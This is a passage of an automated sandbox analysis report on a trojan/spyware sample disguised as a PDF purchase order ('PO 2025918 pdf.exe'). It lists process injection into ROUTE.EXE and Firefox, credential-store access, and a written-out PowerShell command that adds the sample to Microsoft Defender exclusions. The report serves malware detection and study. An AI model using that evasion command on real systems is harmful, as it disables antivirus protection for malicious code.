                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030956308_2_03095630
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031016CC8_2_031016CC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031075718_2_03107571
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030ED5B08_2_030ED5B0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031195C38_2_031195C3
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310F43F8_2_0310F43F
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030414608_2_03041460
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310FB768_2_0310FB76
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0306FB808_2_0306FB80
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0308DBF98_2_0308DBF9
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030C5BF08_2_030C5BF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03107A468_2_03107A46
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310FA498_2_0310FA49
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030C3A6C8_2_030C3A6C
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030EDAAC8_2_030EDAAC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03095AA08_2_03095AA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030F1AA38_2_030F1AA3
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030FDAC68_2_030FDAC6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030E59108_2_030E5910
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030599508_2_03059950
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0306B9508_2_0306B950
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030BD8008_2_030BD800
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030538E08_2_030538E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310FF098_2_0310FF09
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03051F928_2_03051F92
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310FFB18_2_0310FFB1
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03013FD28_2_03013FD2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03013FD58_2_03013FD5
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03059EB08_2_03059EB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03053D408_2_03053D40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03101D5A8_2_03101D5A
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03107D738_2_03107D73
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0306FDC08_2_0306FDC0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030C9C328_2_030C9C32
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310FCF28_2_0310FCF2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02831D308_2_02831D30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0282CBE78_2_0282CBE7
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0282CBF08_2_0282CBF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0282CE108_2_0282CE10
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0282AF348_2_0282AF34
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0282AF408_2_0282AF40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0282ADF08_2_0282ADF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_028353D08_2_028353D0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_028335DD8_2_028335DD
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_028335E08_2_028335E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0284BAD08_2_0284BAD0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F2E2168_2_02F2E216
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F2E3338_2_02F2E333
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F2E6D58_2_02F2E6D5
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F2D7988_2_02F2D798
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F2CA288_2_02F2CA28
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: String function: 0171F290 appears 105 times
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: String function: 016D5130 appears 37 times
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: String function: 0170EA12 appears 86 times
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: String function: 016E7E54 appears 99 times
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: String function: 0168B970 appears 274 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 030BEA12 appears 86 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 03097E54 appears 111 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 0303B970 appears 280 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 030CF290 appears 105 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 03085130 appears 58 times
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2220434300.0000000005C10000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameCaptive.dll" vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2211278593.00000000043B9000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameCaptive.dll" vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000000.00000000.2038210421.0000000000F5E000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenameeBJB.exeB vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2200491712.00000000033F2000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameCaptive.dll" vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2222178450.0000000006341000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2222178450.0000000006341000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamePowerShell.EXEj% vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2223663446.0000000007E90000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameMontero.dll8 vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2195111905.000000000135E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000005.00000002.2457499924.0000000001208000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameroute.exej% vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000005.00000002.2457499924.000000000121A000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameroute.exej% vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe, 00000005.00000002.2459063328.000000000178D000.00000040.00001000.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe; Binary or memory string: OriginalFilenameeBJB.exeB vs PO 2025918 pdf.exe
                      Source: PO 2025918 pdf.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: PO 2025918 pdf.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@10/7@12/9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe; File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO 2025918 pdf.exe.log
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xhpvkcdg.gy5.ps1
                      Source: PO 2025918 pdf.exe; Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe; File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: ROUTE.EXE, 00000008.00000002.3896051765.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2642929579.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2640307768.0000000002C25000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2640126010.0000000002C04000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3896051765.0000000002C25000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: PO 2025918 pdf.exe, 00000000.00000000.2038120981.0000000000EA2000.00000002.00000001.01000000.00000003.sdmp, ROUTE.EXE, 00000008.00000002.3898549588.000000000363C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3897032861.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2748637033.0000000015ECC000.00000004.80000000.00040000.00000000.sdmp; Binary or memory string: INSERT INTO users (first_name, last_name, email, [password]) VALUES (@firstName, @lastName, @email, @password);
                      Source: PO 2025918 pdf.exe; Virustotal: Detection: 33%
                      Source: PO 2025918 pdf.exe; ReversingLabs: Detection: 34%
                      Source: unknown; Process created: C:\Users\user\Desktop\PO 2025918 pdf.exe "C:\Users\user\Desktop\PO 2025918 pdf.exe"
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe"
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe; Process created: C:\Users\user\Desktop\PO 2025918 pdf.exe "C:\Users\user\Desktop\PO 2025918 pdf.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe; Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
                      Source: C:\Windows\SysWOW64\ROUTE.EXE; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: PO 2025918 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PO 2025918 pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: PO 2025918 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: eBJB.pdb source: PO 2025918 pdf.exe
                      Source: Binary string: route.pdb source: PO 2025918 pdf.exe, 00000005.00000002.2457499924.0000000001208000.00000004.00000020.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896147250.0000000001188000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mIrIhAjAJblou.exe, 00000007.00000000.2373430247.00000000005CE000.00000002.00000001.01000000.0000000C.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3895631434.00000000005CE000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: PO 2025918 pdf.exe, 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2454905808.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2460094659.0000000002E5F000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: PO 2025918 pdf.exe, PO 2025918 pdf.exe, 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2454905808.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2460094659.0000000002E5F000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: eBJB.pdbSHA256 source: PO 2025918 pdf.exe
                      Source: Binary string: route.pdbGCTL source: PO 2025918 pdf.exe, 00000005.00000002.2457499924.0000000001208000.00000004.00000020.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896147250.0000000001188000.00000004.00000020.00020000.00000000.sdmp
                      Source: PO 2025918 pdf.exeStatic PE information: 0x8AEDD8A2 [Wed Nov 11 08:28:18 2043 UTC]
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_07C20BD8 push es; ret 0_2_07C20BDA
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_07C20B88 push es; ret 0_2_07C20B8A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_07C2393B pushfd ; ret 0_2_07C2393D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 0_2_07C238EB push eax; ret 0_2_07C238ED
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_00411A5A push edi; iretd 5_2_00411A5B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_00415A13 push esp; ret 5_2_00415A1E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0041623C push edi; retf 5_2_0041623D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0040235F push ds; ret 5_2_0040238E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004143E3 push ebx; ret 5_2_00414440
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004143E3 push edi; retf 5_2_00414477
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0041645E push eax; iretd 5_2_00416462
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0041446E push edi; retf 5_2_00414477
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_00414436 push ebx; ret 5_2_00414440
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004034F0 push eax; ret 5_2_004034F2
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_00404616 push edx; ret 5_2_00404617
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_00418EC4 push eax; retf 5_2_00418EC5
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_004187CA push esi; ret 5_2_004187D1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016909AD push ecx; mov dword ptr [esp], ecx5_2_016909B6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0301225F pushad ; ret 8_2_030127F9
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030127FA pushad ; ret 8_2_030127F9
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030409AD push ecx; mov dword ptr [esp], ecx8_2_030409B6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0301283D push eax; iretd 8_2_03012858
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03011200 push eax; iretd 8_2_03011369
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02832520 push esp; ret 8_2_0283252B
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0282E567 push edi; iretd 8_2_0282E568
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_028352D7 push esi; ret 8_2_028352DE
